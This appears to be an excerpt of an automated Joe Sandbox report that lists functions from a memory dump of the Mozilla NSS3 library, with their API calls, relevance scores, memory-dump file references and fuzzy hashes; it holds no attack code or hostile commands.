Instruction ID: 06755ad281be3bed58a78054f6bd45bcfbdd79f957e22dea14cdc65c0412be21
Opcode Fuzzy Hash: 1ff18ca93d0cfe4196e5bbdf2c11a8536ad6c2002143feef5c81c5f4829847c7
Instruction Fuzzy Hash: B94125756886C08BE7204A29FCB17BB72A5DB4130AF10053DF55FCAEA0E3BDA549C742

Function 6CADEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CADEF38

Part of subcall function 6CAC9520: PK11_IsLoggedIn.NSS3(00000000,?,6CAF379E,?,00000001,?), ref: 6CAC9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CADEF53

Part of subcall function 6CAE4C20: TlsGetValue.KERNEL32 ref: 6CAE4C4C
Part of subcall function 6CAE4C20: EnterCriticalSection.KERNEL32(?), ref: 6CAE4C60
Part of subcall function 6CAE4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CA1
Part of subcall function 6CAE4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CBE
Part of subcall function 6CAE4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4CD2
Part of subcall function 6CAE4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAE4D3A

PR_GetCurrentThread.NSS3 ref: 6CADEF9E

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

free.MOZGLUE(00000000), ref: 6CADEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CADF016
free.MOZGLUE(00000000), ref: 6CADF022

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 4f8cb50bd2744052cc7bafc877cb66f646a0cf156834f5ca3a7034a5b73d1f3c
Instruction ID: 40a8fdc5f5645e41ccdd4929d2f3ef6b368bd6fbafa54a4eeaf7104fab9f4756
Opcode Fuzzy Hash: 4f8cb50bd2744052cc7bafc877cb66f646a0cf156834f5ca3a7034a5b73d1f3c
Instruction Fuzzy Hash: 5E41B271E00209ABDF018FA9DC45BEF7BB9AF48348F054029F914A7350E771D9598BA1

Function 6CACCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CACCF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CACD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CACD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACD025
PR_NewLock.NSS3 ref: 6CACD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CACD074

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 3639d669de320a627e59ebeccd6974b16b20b4b1f02fe801ffb21c594127fe72
Instruction ID: e078e67131a6453d19c1975b9435028d96b6092a993dc4c224e559d9b5e6484e
Opcode Fuzzy Hash: 3639d669de320a627e59ebeccd6974b16b20b4b1f02fe801ffb21c594127fe72
Instruction Fuzzy Hash: 49418DB0B413118FDB109F29C88479A7BE4AF08319F15416AEC1A8BB46D774D8C9CBE2

Function 6CB13FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CB13FF2

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaMark_Util.NSS3(?), ref: 6CB14001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6CB1400F

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6CB14054

Part of subcall function 6CAABB90: PORT_NewArena_Util.NSS3(00001000), ref: 6CAABC24
Part of subcall function 6CAABB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAABC39
Part of subcall function 6CAABB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6CAABC58
Part of subcall function 6CAABB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAABCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB14070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6CB140CD

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 2d128c215d8bc99ce55985cb870159c7ea4464b8333b43fbf6beeb720942edf1
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 6D31E771E083819BEB008F659D45BBF3768EF9064CF144225FD089BB46F762E9988692

Function 6CAB2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CAA2D1A), ref: 6CAB2E7E

Part of subcall function 6CB007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAA8298,?,?,?,6CA9FCE5,?), ref: 6CB007BF
Part of subcall function 6CB007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB007E6
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB0081B
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB00825

PR_Now.NSS3 ref: 6CAB2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CAB2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CAA2D1A), ref: 6CAB2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CAA2D1A), ref: 6CAB2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CAB2F81

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: d1ae2b5d64324279951304be5a90c0469891d82b131d0927515917ccb298be82
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: A031D5715011408BF714CE76DC48BAF726DEF81318F684B7BD429A7AD0EB3598DAC621

Function 6CAA0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CAA0A2C), ref: 6CAA0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CAA0A2C), ref: 6CAA0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CAA0A2C), ref: 6CAA0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CAA0A2C), ref: 6CAA0E90
free.MOZGLUE(00000000), ref: 6CAA0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CAA0A2C), ref: 6CAA0ED9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 9176629275bc0c6b089d4231d53f0fc400580684ff9ca7fa1eaf61fab4410dbf
Instruction ID: b3d90ebfbaa937f3a9666ddf4cd54848aa7bcf1a465bc98fb16a0d94931795a1
Opcode Fuzzy Hash: 9176629275bc0c6b089d4231d53f0fc400580684ff9ca7fa1eaf61fab4410dbf
Instruction Fuzzy Hash: CA212E72F002845BEB3045E59C45B6B76BFDBC1748F1D0036D81A93A01EA61D8DA92A1

Function 6CAAAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAAAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CAAAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAAAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CAAAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CBC9500), ref: 6CAAAF23

Part of subcall function 6CAFF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CAFF0C8
Part of subcall function 6CAFF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAFF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAAAF37

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: ce6457d18b161aef0a9eaede05fa05f8f99aa8f746b26e48e35b2422cd190384
Instruction ID: 88b0e5b91fcf5ed16ca2d5cb7d504a0848270cbf1e854b5bcb331dd9365cdcde
Opcode Fuzzy Hash: ce6457d18b161aef0a9eaede05fa05f8f99aa8f746b26e48e35b2422cd190384
Instruction Fuzzy Hash: 6C212B719093405BEB104E58DC01B5E7BE5AF8572CF144318FC649B781E731D98A8BA7

Function 6CB2EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2EE85
realloc.MOZGLUE(8771BE33,?), ref: 6CB2EEAE
PORT_Alloc_Util.NSS3(?), ref: 6CB2EEC5

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

htonl.WSOCK32(?), ref: 6CB2EEE3
htonl.WSOCK32(00000000,?), ref: 6CB2EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CB2EF01

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: f012cf5c8f9f330b3ae5e23f5386edb533d2cd7a1d404a9acbcd0e70aeefb9bd
Instruction ID: 952e98c66999935377204e1626e1455dae92cba5a9462777d1b66c4be1d0bf56
Opcode Fuzzy Hash: f012cf5c8f9f330b3ae5e23f5386edb533d2cd7a1d404a9acbcd0e70aeefb9bd
Instruction Fuzzy Hash: 6C21E171A002949BCB10AF39DC806AE77A8EF49359F148168EC1DAB651E734E804CBE2

Function 6CADEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CADEE49

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CADEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CADEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CADEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CADEEB3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 5b1285da84def9a29ebf7391ca30a03874f03d9fbc5e9f54ef5b88f4dc8f98fa
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: E121C6BAA002117BEB119B54DC81EABB7A8AB45708F090164FD149B341EA71EC98C7E1

Function 6CAF5ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CAF5D71), ref: 6CAF5F0A
TlsGetValue.KERNEL32 ref: 6CAF5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6CAF5F2F
PR_Unlock.NSS3(890008E8), ref: 6CAF5F55
PR_SetError.NSS3(00000000,00000000), ref: 6CAF5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CAF5F7D

Part of subcall function 6CAF5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CAF5F82,8B4274C0), ref: 6CAF5248
Part of subcall function 6CAF5220: EnterCriticalSection.KERNEL32(0F6CBC0D,?,6CAF5F82,8B4274C0), ref: 6CAF525C
Part of subcall function 6CAF5220: PR_SetError.NSS3(00000000,00000000), ref: 6CAF528E
Part of subcall function 6CAF5220: PR_Unlock.NSS3(0F6CBBF1), ref: 6CAF5299
Part of subcall function 6CAF5220: free.MOZGLUE(00000000), ref: 6CAF52A9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID:
API String ID: 3150690610-0
Opcode ID: efb96b7139395116e2c539cbbab74b38807eef8d1607e646458d9eb9530c3839
Instruction ID: 311542d5bf1102885f7d8b97c4f30ee67a6986f1152c09a2ff820c5af99a4282
Opcode Fuzzy Hash: efb96b7139395116e2c539cbbab74b38807eef8d1607e646458d9eb9530c3839
Instruction Fuzzy Hash: A421E7B5D002045FEB109F68EC41AEEBBB4EF09318F544029E91AA7701EB31A998CBD1

Function 6CAA7F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAA7F68

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6CAA7F7B

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA7FA7

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBC919C,?), ref: 6CAA7FBB

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAA7FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6CBC915C,00000014), ref: 6CAA7FFE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: b41fbc4834a0203cf99bd882f4dfc04554fb837bf15a1cf5f7064dfc94061681
Instruction ID: 77fde98d7a2545423b7dbbc5a79611c38026581d1d91e05834cda0cc39cd81d5
Opcode Fuzzy Hash: b41fbc4834a0203cf99bd882f4dfc04554fb837bf15a1cf5f7064dfc94061681
Instruction Fuzzy Hash: 9011E771E0024466F6109A65AD41BBF77FCDF4965CF08062DFC69D3B82F720A689C2A6

Function 6CAABE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6CB2DC29,?), ref: 6CAABE64

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6CB2DC29,?), ref: 6CAABE78

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6CB2DC29,?), ref: 6CAABE96

Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6CB2DC29,?), ref: 6CAABEBB

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6CB2DC29,?), ref: 6CAABEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6CB2DC29,?), ref: 6CAABEF3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: 1057ca36f6ad80cd7730c801d55ece6eaa6f38ab0cc1d595477fbaa186acbb9a
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: 7311EB71F002495BEB108BA4ED01F6E3BB8DF41248F184129ED08D7741FB31D959C7A1

Function 6CB33C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

